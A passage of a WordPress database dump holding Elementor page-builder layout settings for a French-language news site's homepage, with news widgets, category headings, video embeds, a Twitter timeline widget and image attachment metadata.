"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"0\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(3038,913,'_elementor_version','0.4'),(3039,913,'_elementor_css','a:3:{s:4:\"time\";i:1509550057;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(3041,909,'post_views_count','841'),(3042,914,'_wp_attached_file','2017/11/Bhoye.jpg'),(3043,914,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:640;s:6:\"height\";i:640;s:4:\"file\";s:17:\"2017/11/Bhoye.jpg\";s:5:\"sizes\";a:2:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"Bhoye-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"Bhoye-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(3052,603,'_li_love_count','1'),(3053,681,'_li_love_count','1'),(3054,918,'_elementor_edit_mode','builder'),(3055,918,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom